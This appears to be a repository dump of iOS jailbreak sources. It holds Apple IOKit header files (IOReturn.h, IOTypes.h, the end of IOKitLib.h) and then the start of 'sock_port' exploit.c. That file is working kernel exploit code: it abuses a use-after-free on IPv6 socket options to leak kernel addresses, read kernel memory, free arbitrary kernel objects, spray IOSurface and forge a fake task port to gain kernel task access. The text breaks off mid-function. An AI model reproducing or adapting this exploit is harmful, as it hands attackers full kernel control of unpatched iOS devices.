                           io_scalar_inband_t input,\n                                mach_msg_type_number_t inputCnt,\n                                io_scalar_inband_t output,\n                                mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_structureO(\n                                   mach_port_t connection,\n                                   mach_port_t wake_port,\n                                   io_async_ref_t reference,\n                                   mach_msg_type_number_t referenceCnt,\n                                   int selector,\n                                   io_scalar_inband_t input,\n                                   mach_msg_type_number_t inputCnt,\n                                   io_struct_inband_t output,\n                                   mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_structureI(\n                                   mach_port_t connection,\n                                   mach_port_t wake_port,\n                                   io_async_ref_t reference,\n                                   mach_msg_type_number_t referenceCnt,\n                                   int selector,\n                                   io_scalar_inband_t input,\n                                   mach_msg_type_number_t inputCnt,\n                                   io_struct_inband_t inputStruct,\n                                   mach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_structureI_structureO(\n                                      mach_port_t connection,\n                                      mach_port_t wake_port,\n                                      io_async_ref_t reference,\n                                      mach_msg_type_number_t referenceCnt,\n                                      int selector,\n                                      
io_struct_inband_t input,\n                                      mach_msg_type_number_t inputCnt,\n                                      io_struct_inband_t output,\n                                      mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n#endif // IOCONNECT_NO_32B_METHODS\n\n#endif /* defined(__LP64__) */\n\n__END_DECLS\n\n#endif /* ! _IOKIT_IOKITLIB_H */\n"
  },
  {
    "path": "Exploits/IOKit/IOReturn.h",
    "content": "/*\n * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n *\n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/*\n * HISTORY\n */\n\n/*\n * Core IOReturn values. 
Others may be family defined.\n */\n\n#ifndef __IOKIT_IORETURN_H\n#define __IOKIT_IORETURN_H\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n    \n#include <mach/error.h>\n    \n    typedef    kern_return_t        IOReturn;\n    \n#ifndef sys_iokit\n#define sys_iokit                         err_system(0x38)\n#endif /* sys_iokit */\n#define sub_iokit_common                  err_sub(0)\n#define sub_iokit_usb                     err_sub(1)\n#define sub_iokit_firewire                err_sub(2)\n#define sub_iokit_block_storage           err_sub(4)\n#define sub_iokit_graphics                err_sub(5)\n#define sub_iokit_networking              err_sub(6)\n#define sub_iokit_bluetooth               err_sub(8)\n#define sub_iokit_pmu                     err_sub(9)\n#define sub_iokit_acpi                    err_sub(10)\n#define sub_iokit_smbus                   err_sub(11)\n#define sub_iokit_ahci                    err_sub(12)\n#define sub_iokit_powermanagement         err_sub(13)\n#define sub_iokit_hidsystem               err_sub(14)\n#define sub_iokit_scsi                    err_sub(16)\n#define sub_iokit_usbaudio                err_sub(17)\n    //#define sub_iokit_pccard                err_sub(21)\n#define sub_iokit_thunderbolt             err_sub(29)\n#define sub_iokit_graphics_acceleration      err_sub(30)\n#define sub_iokit_keystore                err_sub(31)\n#define sub_iokit_platform                err_sub(0x2A)\n#define sub_iokit_audio_video             err_sub(0x45)\n#define sub_iokit_cec                     err_sub(0x46)\n#define sub_iokit_baseband                err_sub(0x80)\n#define sub_iokit_HDA                     err_sub(0xFE)\n#define sub_iokit_hsic                    err_sub(0x147)\n#define sub_iokit_sdio                    err_sub(0x174)\n#define sub_iokit_wlan                    err_sub(0x208)\n#define sub_iokit_appleembeddedsleepwakehandler  err_sub(0x209)\n    \n#define sub_iokit_vendor_specific         err_sub(-2)\n#define sub_iokit_reserved            
    err_sub(-1)\n    \n#define    iokit_common_err(return)          (sys_iokit|sub_iokit_common|return)\n#define    iokit_family_err(sub,return)      (sys_iokit|sub|return)\n#define iokit_vendor_specific_err(return) (sys_iokit|sub_iokit_vendor_specific|return)\n    \n#define kIOReturnSuccess         KERN_SUCCESS            // OK\n#define kIOReturnError           iokit_common_err(0x2bc) // general error\n#define kIOReturnNoMemory        iokit_common_err(0x2bd) // can't allocate memory\n#define kIOReturnNoResources     iokit_common_err(0x2be) // resource shortage\n#define kIOReturnIPCError        iokit_common_err(0x2bf) // error during IPC\n#define kIOReturnNoDevice        iokit_common_err(0x2c0) // no such device\n#define kIOReturnNotPrivileged   iokit_common_err(0x2c1) // privilege violation\n#define kIOReturnBadArgument     iokit_common_err(0x2c2) // invalid argument\n#define kIOReturnLockedRead      iokit_common_err(0x2c3) // device read locked\n#define kIOReturnLockedWrite     iokit_common_err(0x2c4) // device write locked\n#define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and\n    //   device already open\n#define kIOReturnBadMessageID    iokit_common_err(0x2c6) // sent/received messages\n    //   had different msg_id\n#define kIOReturnUnsupported     iokit_common_err(0x2c7) // unsupported function\n#define kIOReturnVMError         iokit_common_err(0x2c8) // misc. 
VM failure\n#define kIOReturnInternalError   iokit_common_err(0x2c9) // internal error\n#define kIOReturnIOError         iokit_common_err(0x2ca) // General I/O error\n    //#define kIOReturn???Error      iokit_common_err(0x2cb) // ???\n#define kIOReturnCannotLock      iokit_common_err(0x2cc) // can't acquire lock\n#define kIOReturnNotOpen         iokit_common_err(0x2cd) // device not open\n#define kIOReturnNotReadable     iokit_common_err(0x2ce) // read not supported\n#define kIOReturnNotWritable     iokit_common_err(0x2cf) // write not supported\n#define kIOReturnNotAligned      iokit_common_err(0x2d0) // alignment error\n#define kIOReturnBadMedia        iokit_common_err(0x2d1) // Media Error\n#define kIOReturnStillOpen       iokit_common_err(0x2d2) // device(s) still open\n#define kIOReturnRLDError        iokit_common_err(0x2d3) // rld failure\n#define kIOReturnDMAError        iokit_common_err(0x2d4) // DMA failure\n#define kIOReturnBusy            iokit_common_err(0x2d5) // Device Busy\n#define kIOReturnTimeout         iokit_common_err(0x2d6) // I/O Timeout\n#define kIOReturnOffline         iokit_common_err(0x2d7) // device offline\n#define kIOReturnNotReady        iokit_common_err(0x2d8) // not ready\n#define kIOReturnNotAttached     iokit_common_err(0x2d9) // device not attached\n#define kIOReturnNoChannels      iokit_common_err(0x2da) // no DMA channels left\n#define kIOReturnNoSpace         iokit_common_err(0x2db) // no space for data\n    //#define kIOReturn???Error      iokit_common_err(0x2dc) // ???\n#define kIOReturnPortExists      iokit_common_err(0x2dd) // port already exists\n#define kIOReturnCannotWire      iokit_common_err(0x2de) // can't wire down\n    //   physical memory\n#define kIOReturnNoInterrupt     iokit_common_err(0x2df) // no interrupt attached\n#define kIOReturnNoFrames        iokit_common_err(0x2e0) // no DMA frames enqueued\n#define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received\n    //   on interrupt 
port\n#define kIOReturnNotPermitted    iokit_common_err(0x2e2) // not permitted\n#define kIOReturnNoPower         iokit_common_err(0x2e3) // no power to device\n#define kIOReturnNoMedia         iokit_common_err(0x2e4) // media not present\n#define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted\n#define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode\n#define kIOReturnUnderrun        iokit_common_err(0x2e7) // data underrun\n#define kIOReturnOverrun         iokit_common_err(0x2e8) // data overrun\n#define kIOReturnDeviceError     iokit_common_err(0x2e9) // the device is not working properly!\n#define kIOReturnNoCompletion     iokit_common_err(0x2ea) // a completion routine is required\n#define kIOReturnAborted     iokit_common_err(0x2eb) // operation aborted\n#define kIOReturnNoBandwidth     iokit_common_err(0x2ec) // bus bandwidth would be exceeded\n#define kIOReturnNotResponding     iokit_common_err(0x2ed) // device not responding\n#define kIOReturnIsoTooOld     iokit_common_err(0x2ee) // isochronous I/O request for distant past!\n#define kIOReturnIsoTooNew     iokit_common_err(0x2ef) // isochronous I/O request for distant future\n#define kIOReturnNotFound        iokit_common_err(0x2f0) // data was not found\n#define kIOReturnInvalid         iokit_common_err(0x1)   // should never be seen\n    \n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IORETURN_H */\n"
  },
  {
    "path": "Exploits/IOKit/IOTypes.h",
    "content": "/*\n * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n *\n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n#ifndef    __IOKIT_IOTYPES_H\n#define __IOKIT_IOTYPES_H\n\n#ifndef IOKIT\n#define IOKIT 1\n#endif /* !IOKIT */\n\n#include <mach/message.h>\n#include <mach/vm_types.h>\n\n#include \"IOReturn.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n    \n#ifndef    NULL\n#if defined (__cplusplus)\n#define    NULL    0\n#else\n#define NULL ((void *)0)\n#endif\n#endif\n    \n    /*\n     * Simple data types.\n     */\n#include <stdbool.h>\n#define OSTYPES_K64_REV        2\n    \n    typedef unsigned int        UInt;\n    typedef signed int         SInt;\n    \n    \n    typedef UInt32        IOOptionBits;\n    typedef 
SInt32        IOFixed;\n    typedef UInt32        IOVersion;\n    typedef UInt32        IOItemCount;\n    typedef UInt32      IOCacheMode;\n    \n    typedef UInt32         IOByteCount32;\n    typedef UInt64         IOByteCount64;\n    \n    typedef UInt32    IOPhysicalAddress32;\n    typedef UInt64    IOPhysicalAddress64;\n    typedef UInt32    IOPhysicalLength32;\n    typedef UInt64    IOPhysicalLength64;\n    \n#if !defined(__arm__) && !defined(__i386__)\n    typedef mach_vm_address_t    IOVirtualAddress;\n#else\n    typedef vm_address_t        IOVirtualAddress;\n#endif\n    \n#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))\n    typedef IOByteCount64        IOByteCount;\n#else\n    typedef IOByteCount32         IOByteCount;\n#endif\n    \n    typedef IOVirtualAddress    IOLogicalAddress;\n    \n#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))\n    \n    typedef IOPhysicalAddress64     IOPhysicalAddress;\n    typedef IOPhysicalLength64     IOPhysicalLength;\n#define IOPhysical32( hi, lo )        ((UInt64) lo + ((UInt64)(hi) << 32))\n#define IOPhysSize    64\n    \n#else\n    \n    typedef IOPhysicalAddress32     IOPhysicalAddress;\n    typedef IOPhysicalLength32     IOPhysicalLength;\n#define IOPhysical32( hi, lo )        (lo)\n#define IOPhysSize    32\n    \n#endif\n    \n    \n    typedef struct\n    {\n        IOPhysicalAddress    address;\n        IOByteCount        length;\n    } IOPhysicalRange;\n    \n    typedef struct\n    {\n        IOVirtualAddress    address;\n        IOByteCount        length;\n    } IOVirtualRange;\n    \n#if !defined(__arm__) && !defined(__i386__)\n    typedef IOVirtualRange    IOAddressRange;\n#else\n    typedef struct\n    {\n        mach_vm_address_t    address;\n        mach_vm_size_t    length;\n    } IOAddressRange;\n#endif\n    \n    /*\n     * Map between #defined or enum'd constants and text description.\n     */\n    typedef struct {\n      
  int value;\n        const char *name;\n    } IONamedValue;\n    \n    \n    /*\n     * Memory alignment -- specified as a power of two.\n     */\n    typedef unsigned int    IOAlignment;\n    \n#define IO_NULL_VM_TASK        ((vm_task_t)0)\n    \n    \n    /*\n     * Pull in machine specific stuff.\n     */\n    \n    //#include <IOKit/machine/IOTypes.h>\n    \n#ifndef MACH_KERNEL\n    \n#ifndef __IOKIT_PORTS_DEFINED__\n#define __IOKIT_PORTS_DEFINED__\n    typedef mach_port_t    io_object_t;\n#endif /* __IOKIT_PORTS_DEFINED__ */\n    \n#include <device/device_types.h>\n    \n    typedef io_object_t    io_connect_t;\n    typedef io_object_t    io_enumerator_t;\n    typedef io_object_t    io_iterator_t;\n    typedef io_object_t    io_registry_entry_t;\n    typedef io_object_t    io_service_t;\n    \n#define    IO_OBJECT_NULL    ((io_object_t) 0)\n    \n#endif /* MACH_KERNEL */\n    \n    // IOConnectMapMemory memoryTypes\n    enum {\n        kIODefaultMemoryType    = 0\n    };\n    \n    enum {\n        kIODefaultCache        = 0,\n        kIOInhibitCache        = 1,\n        kIOWriteThruCache        = 2,\n        kIOCopybackCache        = 3,\n        kIOWriteCombineCache    = 4,\n        kIOCopybackInnerCache    = 5,\n        kIOPostedWrite        = 6\n    };\n    \n    // IOMemory mapping options\n    enum {\n        kIOMapAnywhere        = 0x00000001,\n        \n        kIOMapCacheMask        = 0x00000700,\n        kIOMapCacheShift        = 8,\n        kIOMapDefaultCache        = kIODefaultCache       << kIOMapCacheShift,\n        kIOMapInhibitCache        = kIOInhibitCache       << kIOMapCacheShift,\n        kIOMapWriteThruCache    = kIOWriteThruCache     << kIOMapCacheShift,\n        kIOMapCopybackCache        = kIOCopybackCache      << kIOMapCacheShift,\n        kIOMapWriteCombineCache    = kIOWriteCombineCache  << kIOMapCacheShift,\n        kIOMapCopybackInnerCache    = kIOCopybackInnerCache << kIOMapCacheShift,\n        kIOMapPostedWrite        = 
kIOPostedWrite    << kIOMapCacheShift,\n        \n        kIOMapUserOptionsMask    = 0x00000fff,\n        \n        kIOMapReadOnly        = 0x00001000,\n        \n        kIOMapStatic        = 0x01000000,\n        kIOMapReference        = 0x02000000,\n        kIOMapUnique        = 0x04000000,\n        kIOMapPrefault        = 0x10000000,\n        kIOMapOverwrite     = 0x20000000\n    };\n    \n    /*! @enum Scale Factors\n     @discussion Used when a scale_factor parameter is required to define a unit of time.\n     @constant kNanosecondScale Scale factor for nanosecond based times.\n     @constant kMicrosecondScale Scale factor for microsecond based times.\n     @constant kMillisecondScale Scale factor for millisecond based times.\n     @constant kTickScale Scale factor for the standard (100Hz) tick.\n     @constant kSecondScale Scale factor for second based times. */\n    \n    enum {\n        kNanosecondScale  = 1,\n        kMicrosecondScale = 1000,\n        kMillisecondScale = 1000 * 1000,\n        kSecondScale      = 1000 * 1000 * 1000,\n        kTickScale        = (kSecondScale / 100)\n    };\n    \n    enum {\n        kIOConnectMethodVarOutputSize = -3\n    };\n    \n    /* compatibility types */\n    \n    \n    typedef unsigned int IODeviceNumber;\n    \n    \n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IOTYPES_H */\n"
  },
  {
    "path": "Exploits/sock_port/exploit.c",
    "content": "//\n//  exploit.c\n//  sock_port\n//\n//  Created by Jake James on 7/17/19.\n//  Copyright © 2019 Jake James. All rights reserved.\n//\n\n#include \"exploit.h\"\nuint64_t current_task;\nuint64_t kernel_slide = 0;\n// utilities to manipulate sockets\nint set_minmtu(int sock, int *minmtu) {\n    return setsockopt(sock, IPPROTO_IPV6, IPV6_USE_MIN_MTU, minmtu, sizeof(*minmtu));\n}\n\nint get_minmtu(int sock, int *minmtu) {\n    socklen_t size = sizeof(*minmtu);\n    return getsockopt(sock, IPPROTO_IPV6, IPV6_USE_MIN_MTU, minmtu, &size);\n}\n\nint get_prefertempaddr(int sock, int *prefertempaddr) {\n    socklen_t size = sizeof(*prefertempaddr);\n    return getsockopt(sock, IPPROTO_IPV6, IPV6_PREFER_TEMPADDR, prefertempaddr, &size);\n}\n\nint set_prefertempaddr(int sock, int *prefertempaddr) {\n    return setsockopt(sock, IPPROTO_IPV6, IPV6_PREFER_TEMPADDR, prefertempaddr, sizeof(*prefertempaddr));\n}\n\nint get_pktinfo(int sock, struct in6_pktinfo *pktinfo) {\n    socklen_t size = sizeof(*pktinfo);\n    return getsockopt(sock, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo, &size);\n}\n\nint set_pktinfo(int sock, struct in6_pktinfo *pktinfo) {\n    return setsockopt(sock, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo, sizeof(*pktinfo));\n}\n\n// free the pktopts struct of the socket to get ready for UAF\nint free_socket_options(int sock) {\n    return disconnectx(sock, 0, 0);\n}\n\n// return a socket we can UAF on\nint get_socket() {\n    int sock = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);\n    if (sock < 0) {\n        printf(\"Can't get socket, error %d (%s)\\n\", errno, strerror(errno));\n        return -1;\n    }\n    \n    // allow setsockopt() after disconnect()\n    struct so_np_extensions sonpx = {.npx_flags = SONPX_SETOPTSHUT, .npx_mask = SONPX_SETOPTSHUT};\n    int ret = setsockopt(sock, SOL_SOCKET, SO_NP_EXTENSIONS, &sonpx, sizeof(sonpx));\n    if (ret) {\n        printf(\"setsockopt() failed, error %d (%s)\\n\", errno, strerror(errno));\n        return -1;\n    
}\n    \n    return sock;\n}\n\n// return a socket ready for UAF\nint get_socket_with_dangling_options() {\n    int socket = get_socket();\n    \n    int minmtu = -1;\n    set_minmtu(socket, &minmtu);\n    \n    free_socket_options(socket);\n    \n    return socket;\n}\n\nmach_port_t new_port() {\n    mach_port_t port;\n    kern_return_t rv = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);\n    if (rv) {\n        printf(\"Failed to allocate port (%s)\\n\", mach_error_string(rv));\n        return MACH_PORT_NULL;\n    }\n    rv = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\n    if (rv) {\n        printf(\"Failed to insert right (%s)\\n\", mach_error_string(rv));\n        return MACH_PORT_NULL;\n    }\n    return port;\n}\n\n// first primitive: leak the kernel address of a mach port\nuint64_t find_port_via_uaf(mach_port_t port, int disposition) {\n    // here we use the uaf as an info leak\n    int sock = get_socket_with_dangling_options();\n    \n    for (int i = 0; i < 0x10000; i++) {\n        // since the UAFd field is 192 bytes, we need 192/sizeof(uint64_t) pointers\n        mach_port_t p = fill_kalloc_with_port_pointer(port, 192/sizeof(uint64_t), MACH_MSG_TYPE_COPY_SEND);\n        \n        int mtu;\n        int pref;\n        get_minmtu(sock, &mtu); // this is like doing rk32(options + 180);\n        get_prefertempaddr(sock, &pref); // this like rk32(options + 184);\n\n        uint64_t ptr = (((uint64_t)mtu << 32) & 0xffffffff00000000) | ((uint64_t)pref & 0x00000000ffffffff);\n        \n        if (mtu >= 0xffffff00 && mtu != 0xffffffff && pref != 0xdeadbeef) {\n            mach_port_destroy(mach_task_self(), p);\n            close(sock);\n            return ptr;\n        }\n        mach_port_destroy(mach_task_self(), p);\n    }\n    \n    // close that socket.\n    close(sock);\n    return 0;\n}\n\n// function to cache our task port kernel address\nuint64_t task_self_addr() {\n    static uint64_t 
cached_task_self_addr = 0;\n    if (cached_task_self_addr) return cached_task_self_addr;\n    else return find_port_via_uaf(mach_task_self(), MACH_MSG_TYPE_COPY_SEND);\n}\n\n// second primitive: read 20 bytes from addr\nvoid* read_20_via_uaf(uint64_t addr) {\n    // create a bunch of sockets\n    int sockets[128];\n    for (int i = 0; i < 128; i++) {\n        sockets[i] = get_socket_with_dangling_options();\n    }\n    \n    // create a fake struct with our dangling port address as its pktinfo\n    struct ip6_pktopts *fake_opts = calloc(1, sizeof(struct ip6_pktopts));\n    fake_opts->ip6po_minmtu = 0x41424344; // give a number we can recognize\n    *(uint32_t*)((uint64_t)fake_opts + 164) = 0x41424344; // on iOS 10, offset is different\n    fake_opts->ip6po_pktinfo = (struct in6_pktinfo*)addr;\n    \n    bool found = false;\n    int found_at = -1;\n    \n    for (int i = 0; i < 20; i++) { // iterate through the sockets to find if we overwrote one\n        spray_IOSurface((void *)fake_opts, sizeof(struct ip6_pktopts));\n        \n        for (int j = 0; j < 128; j++) {\n            int minmtu = -1;\n            get_minmtu(sockets[j], &minmtu);\n            if (minmtu == 0x41424344) { // found it!\n                found_at = j; // save its index\n                found = true;\n                break;\n            }\n        }\n        if (found) break;\n    }\n    \n    free(fake_opts);\n    \n    if (!found) {\n        printf(\"Failed to read kernel\\n\");\n        return 0;\n    }\n    \n    for (int i = 0; i < 128; i++) {\n        if (i != found_at) {\n            close(sockets[i]);\n        }\n    }\n    \n    void *buf = malloc(sizeof(struct in6_pktinfo));\n    get_pktinfo(sockets[found_at], (struct in6_pktinfo *)buf);\n    close(sockets[found_at]);\n    \n    return buf;\n}\n\nuint64_t rk64_via_uaf(uint64_t addr) {\n    void *buf = read_20_via_uaf(addr);\n    if (buf) {\n        uint64_t r = *(uint64_t*)buf;\n        free(buf);\n        return r;\n    }\n    
return 0;\n}\n\n// third primitive: free a kalloced object at an arbitrary address\nint free_via_uaf(uint64_t addr) {\n    // create a bunch of sockets\n    int sockets[128];\n    for (int i = 0; i < 128; i++) {\n        sockets[i] = get_socket_with_dangling_options();\n    }\n    \n    // create a fake struct with our dangling port address as its pktinfo\n    struct ip6_pktopts *fake_opts = calloc(1, sizeof(struct ip6_pktopts));\n    fake_opts->ip6po_minmtu = 0x41424344; // give a number we can recognize\n    *(uint32_t*)((uint64_t)fake_opts + 164) = 0x41424344; // on iOS 10, offset is different\n    fake_opts->ip6po_pktinfo = (struct in6_pktinfo*)addr;\n    \n    bool found = false;\n    int found_at = -1;\n    \n    for (int i = 0; i < 20; i++) { // iterate through the sockets to find if we overwrote one\n        spray_IOSurface((void *)fake_opts, sizeof(struct ip6_pktopts));\n        \n        for (int j = 0; j < 128; j++) {\n            int minmtu = -1;\n            get_minmtu(sockets[j], &minmtu);\n            if (minmtu == 0x41424344) { // found it!\n                found_at = j; // save its index\n                found = true;\n                break;\n            }\n        }\n        if (found) break;\n    }\n    \n    free(fake_opts);\n    \n    if (!found) {\n        printf(\"failed to setup freeing primitive\\n\");\n        return -1;\n    }\n    \n    for (int i = 0; i < 128; i++) {\n        if (i != found_at) {\n            close(sockets[i]);\n        }\n    }\n    struct in6_pktinfo *buf = malloc(sizeof(struct in6_pktinfo));\n    memset(buf, 0, sizeof(struct in6_pktinfo));\n    \n    int ret = set_pktinfo(sockets[found_at], buf);\n    free(buf);\n    return ret;\n}\n\n\nstatic inline uint32_t mach_port_waitq_flags() {\n    union waitq_flags waitq_flags = {};\n    waitq_flags.waitq_type              = WQT_QUEUE;\n    waitq_flags.waitq_fifo              = 1;\n    waitq_flags.waitq_prepost           = 0;\n    waitq_flags.waitq_irq               = 0;\n   
 waitq_flags.waitq_isvalid           = 1;\n    waitq_flags.waitq_turnstile_or_port = 1;\n    return waitq_flags.flags;\n}\n\nuint64_t self_port_addr;\nmach_port_t get_tfp0() {\n    printf(\"The sock_port exploit started!\\n\");\n    \n    offsets_init();\n    \n    kern_return_t ret = init_IOSurface();\n    if (ret) {\n        printf(\"ERROR: SockPort: can't init IOSurface!\\n\");\n        return MACH_PORT_NULL;\n    }\n    printf(\"SockPort: Initialized IOSurface\\n\");\n\n    bool SMAP = false;\n\n    if (pagesize == 0x4000) {\n        struct utsname a;\n        uname(&a);\n        if (!strstr(a.machine, \"iPad5,\") && !strstr(a.machine, \"iPad6,\") && !strstr(a.machine, \"iPhone8,\")) {\n            printf(\"SockPort: Detected SMAP device!\\n\");\n            SMAP = true;\n        }\n    }\n    \n    self_port_addr = task_self_addr(); // port leak primitive\n    if (!self_port_addr) {\n        printf(\"ERROR: SockPort: failed to leak our task port address!\\n\");\n        goto err;\n    }\n    \n    printf(\"SockPort: Our task port: 0x%llx\\n\", self_port_addr);\n    \n    // kernel read primitive\n    uint64_t ipc_space_kernel = rk64_via_uaf(self_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));\n    if (!ipc_space_kernel) {\n        printf(\"ERROR: SockPort: kernel read primitive failed!\\n\");\n        goto err;\n    }\n    printf(\"SockPort: ipc_space_kernel: 0x%llx\\n\", ipc_space_kernel);\n    \n    // here we'll create a pair of pipes (4 file descriptors in total)\n    // first pipe, used to overwrite a port pointer in a mach message\n    int fds[2];\n    ret = pipe(fds);\n    if (ret) {\n        printf(\"ERROR: SockPort: failed to create pipe\\n\");\n        goto err;\n    }\n    \n    // make the buffer of the first pipe 0x10000 bytes (this could be other sizes, but know that kernel does some calculations on how big this gets, i.e. 
when I made the buffer 20 bytes, it'd still go to kalloc.512\n    uint8_t pipebuf[0x10000];\n    memset(pipebuf, 0, 0x10000);\n    \n    write(fds[1], pipebuf, 0x10000); // do write() to allocate the buffer on the kernel\n    read(fds[0], pipebuf, 0x10000); // do read() to reset buffer position\n    write(fds[1], pipebuf, 8); // write 8 bytes so later we can read the first 8 bytes (used to verify if spraying worked)\n    \n    // second pipe, used for our fake port\n    int port_fds[2] = {-1, -1};\n    if (SMAP) {\n        ret = pipe(port_fds);\n        if (ret) {\n            printf(\"ERROR: SockPort: failed to create pipe\\n\");\n            goto err;\n        }\n    }\n    \n    // create fake port and fake task, put fake_task right after fakeport\n    kport_t *fakeport = malloc(sizeof(kport_t) + 0x600);\n    ktask_t *fake_task = (ktask_t *)((uint64_t)fakeport + sizeof(kport_t));\n    bzero((void *)fakeport, sizeof(kport_t) + 0x600);\n    \n    fake_task->ref_count = 0xff;\n    \n    fakeport->ip_bits = IO_BITS_ACTIVE | IKOT_TASK;\n    fakeport->ip_references = 0xd00d;\n    fakeport->ip_lock.type = 0x11;\n    fakeport->ip_messages.port.receiver_name = 1;\n    fakeport->ip_messages.port.msgcount = 0;\n    fakeport->ip_messages.port.qlimit = MACH_PORT_QLIMIT_LARGE;\n    fakeport->ip_messages.port.waitq.flags = mach_port_waitq_flags();\n    fakeport->ip_srights = 99;\n    fakeport->ip_kobject = 0;\n    fakeport->ip_receiver = ipc_space_kernel;\n\n    if (SMAP) {\n        write(port_fds[1], (void *)fakeport, sizeof(kport_t) + 0x600);\n        read(port_fds[0], (void *)fakeport, sizeof(kport_t) + 0x600);\n    }\n    \n    // find the pipe buffers for both pipes\n    \n#define rk64_check(addr) ({ uint64_t r; r = rk64_via_uaf(addr); if (!r) { usleep(100); r = rk64_via_uaf(addr); if (!r) { printf(\"ERROR: failed to read from '\"#addr\"'\\n\"); goto err;}}; r;})\n    \n    uint64_t task = rk64_check(self_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n    
uint64_t proc = rk64_check(task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n    uint64_t p_fd = rk64_check(proc + koffset(KSTRUCT_OFFSET_PROC_P_FD));\n    uint64_t fd_ofiles = rk64_check(p_fd + koffset(KSTRUCT_OFFSET_FILEDESC_FD_OFILES));\n    \n    uint64_t fproc = rk64_check(fd_ofiles + fds[0] * 8);\n    uint64_t f_fglob = rk64_check(fproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));\n    uint64_t fg_data = rk64_check(f_fglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));\n    uint64_t pipe_buffer = rk64_check(fg_data + koffset(KSTRUCT_OFFSET_PIPE_BUFFER));\n    printf(\"SockPort: pipe buffer: 0x%llx\\n\", pipe_buffer);\n\n    uint64_t port_fg_data = 0;\n    uint64_t port_pipe_buffer = 0;\n    \n    if (SMAP) {\n        fproc = rk64_check(fd_ofiles + port_fds[0] * 8);\n        f_fglob = rk64_check(fproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));\n        port_fg_data = rk64_check(f_fglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));\n        port_pipe_buffer = rk64_check(port_fg_data + koffset(KSTRUCT_OFFSET_PIPE_BUFFER));\n        printf(\"SockPort: second pipe buffer: 0x%llx\\n\", port_pipe_buffer);\n    }\n    \n    if (SMAP) {\n        // align ip_kobject at our fake task, so the address of fake port + sizeof(kport_t)\n        fakeport->ip_kobject = port_pipe_buffer + sizeof(kport_t);\n    }\n    else {\n        fakeport->ip_kobject = (uint64_t)fake_task;\n    }\n    \n    if (SMAP) {\n        // update our pipe buffer\n        write(port_fds[1], (void *)fakeport, sizeof(kport_t) + 0x600);\n    }\n    \n    // create a new port, this one we'll use for tfp0\n    mach_port_t target = new_port();\n    if (!target) {\n        printf(\"ERROR: SockPort: failed to allocate port\\n\");\n        goto err;\n    }\n    \n    // get its kernel address\n    uint64_t target_addr = find_port_via_uaf(target, MACH_MSG_TYPE_COPY_SEND);\n    if (!target_addr) {\n        printf(\"ERROR: SockPort: failed to leak target port address\\n\");\n        goto err;\n    }\n    \n    // 
